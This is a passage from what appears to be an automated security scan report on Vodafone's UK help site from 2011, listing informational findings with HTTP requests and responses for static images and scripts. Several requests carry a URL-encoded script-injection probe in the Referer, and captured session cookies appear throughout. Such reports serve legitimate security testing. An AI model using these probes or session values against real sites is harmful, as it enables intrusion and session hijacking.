.............tEXtSoftware.Adobe ImageReadyq.e<...-PLTE.............................................WP......tRNS......................3IDATx.b.......6.........e..2xy..a.F0...Y1.
...[SNIP]...

11.25. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/input_left_med.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/redesign/images/input_left_med.png

Request

GET /system/web/view/selfservice/templates/vodafone/img/redesign/images/input_left_med.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/main.css?v=20110504
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265; BIGipServerpool_ems00820ss=1426065674.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 1927
Content-Type: application/octet-stream
Last-Modified: Mon, 07 Jun 2010 09:10:16 GMT
Accept-Ranges: bytes
ETag: "08c5a3e216cb1:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:46 GMT

.PNG
.
...IHDR...@.........oT.Y....tEXtSoftware.Adobe ImageReadyq.e<....PLTE......................................................................................................rrr.................
...[SNIP]...

11.26. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/sprite_arrow-buttons-alpha-fs8.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/redesign/images/sprite_arrow-buttons-alpha-fs8.png

Request

GET /system/web/view/selfservice/templates/vodafone/img/redesign/images/sprite_arrow-buttons-alpha-fs8.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/main.css?v=20110504
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265; BIGipServerpool_ems00820ss=1426065674.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 2522
Content-Type: application/octet-stream
Last-Modified: Tue, 15 Jun 2010 16:35:14 GMT
Accept-Ranges: bytes
ETag: "0de8baa8ccb1:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:46 GMT

.PNG
.
...IHDR...j...j.....c.4....4PLTE...............................................................................................................................................................
...[SNIP]...

11.27. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/sprite_button_med.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/redesign/images/sprite_button_med.png

Request

GET /system/web/view/selfservice/templates/vodafone/img/redesign/images/sprite_button_med.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/main.css?v=20110504
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265; BIGipServerpool_ems00820ss=1426065674.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 3102
Content-Type: application/octet-stream
Last-Modified: Mon, 07 Jun 2010 09:10:16 GMT
Accept-Ranges: bytes
ETag: "08c5a3e216cb1:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:46 GMT

.PNG
.
...IHDR...b.........mNb.....tEXtSoftware.Adobe ImageReadyq.e<....PLTE.......YY....NN...uuu]]]......qqq. zzz...bbbxxx...vvv.AA...___.**kkk.44.zzXXX............................................
...[SNIP]...

11.28. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jcarousellite.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/jcarousellite.js

Request

Response

11.29. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jquery.ba-hashchange.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/jquery.ba-hashchange.min.js

Request

Response

11.30. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/main.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/main.js

Request

GET /system/web/view/selfservice/templates/vodafone/js/main.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 9791
Content-Type: application/octet-stream
Last-Modified: Fri, 04 Jun 2010 13:44:37 GMT
Accept-Ranges: bytes
ETag: "86eca612ec3cb1:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:20 GMT

// Hide instruction text for password field
function txt2pwd(obj, pwd){
obj.style.visibility = "hidden";
document.getElementById(pwd).focus();
}

// Display instruction text for password field
...[SNIP]...

11.31. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery-1.4.2.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery-1.4.2.min.js

Request

Response

11.32. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.ba-resize.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.ba-resize.min.js

Request

Response

11.33. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.easing.1.3.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.easing.1.3.js

Request

Response

11.34. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.scrollTo-1.4.2-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.scrollTo-1.4.2-min.js

Request

Response

11.35. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.selectbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.selectbox.js

Request

Response

11.36. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.formValidation.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.formValidation.js

Request

Response

11.37. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.config.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.config.js

Request

GET /system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.config.js?v=20110504 HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 792
Content-Type: application/octet-stream
Last-Modified: Wed, 27 Apr 2011 17:48:29 GMT
Accept-Ranges: bytes
ETag: "4133995135cc1:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:42 GMT

/* Configuration File */
vdf.helpCenter.config = {
   mainConfigID : 1000,
   deviceConfigID : 1058,
   getFilterModels : "web/view/selfservice/templates/vodafone/FetchDeviceDropDownData.jsp",
   getPhoneLis
...[SNIP]...

11.38. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.guide.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.guide.js

Request

GET /system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.guide.js?v=20110504 HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

11.39. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.homecarousel.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.homecarousel.js

Request

GET /system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.homecarousel.js?v=20110504 HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 4188
Content-Type: application/octet-stream
Last-Modified: Wed, 30 Jun 2010 09:27:12 GMT
Accept-Ranges: bytes
ETag: "018706b3618cb1:1127"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:42 GMT

/*jslint evil: true, forin: true */

/**
* @fileOverview Methods and Functions for the home carousel behaviors
* @author Sapient
* @version 0.1
* @class
* @namespace vdf.helpCenter.searchPage
...[SNIP]...

11.40. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.js

Request

GET /system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.js?v=20110504 HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 18173
Content-Type: application/octet-stream
Last-Modified: Wed, 27 Apr 2011 12:27:00 GMT
Accept-Ranges: bytes
ETag: "02ed67d64cc1:114c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:40 GMT

/*jslint evil: true, forin: true */

/**
* @fileOverview These are the core functions of the Vodafone helpCenter application
* @author Sapient
* @requires -
* @version 0.1
* @class
*/

/**
* Genera
...[SNIP]...

11.41. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.searchPage.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.searchPage.js

Request

GET /system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.searchPage.js?v=20110504 HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 26771
Content-Type: application/octet-stream
Last-Modified: Mon, 31 Jan 2011 15:09:29 GMT
Accept-Ranges: bytes
ETag: "1712b7db58c1cb1:1249"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:40 GMT

/*jslint evil: true, forin: true */

/**
* @fileOverview Methods and Functions for the searchPage behaviors
* @author Sapient
* @version 0.1
* @class
* @namespace vdf.helpCenter.searchPage
*
...[SNIP]...

11.42. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.js

Request

Response

11.43. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.ui.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.ui.js

Request

Response

11.44. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/swfobject.js

Request

Response

11.45. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/liveperson/mtagconfig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/liveperson/mtagconfig.js

Request

GET /system/web/view/selfservice/templates/vodafone/liveperson/mtagconfig.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 5641
Content-Type: application/octet-stream
Last-Modified: Mon, 29 Mar 2010 11:11:33 GMT
Accept-Ranges: bytes
ETag: "2c7b5c9730cfca1:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:20 GMT

// Date last modified = 20100226
// Modified by = YT

var lpMTagConfig = {
   'lpServer' : 'server.lon.liveperson.net',
   'lpNumber' : '90571995',
   'lpProtocol' : (document.location.toString().in
...[SNIP]...

11.46. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/misclinks.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/misclinks.js

Request

GET /system/web/view/selfservice/templates/vodafone/misclinks.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 574
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:19 GMT
Accept-Ranges: bytes
ETag: "802f933d5bafc81:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:20 GMT

function submitMiscLinks(cmd, configurationId, partitionId)
{
// special handling of log off request, send log off from the same frame or parent frame
// depending on the deployment i.e frame b
...[SNIP]...

11.47. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js

Request

GET /system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
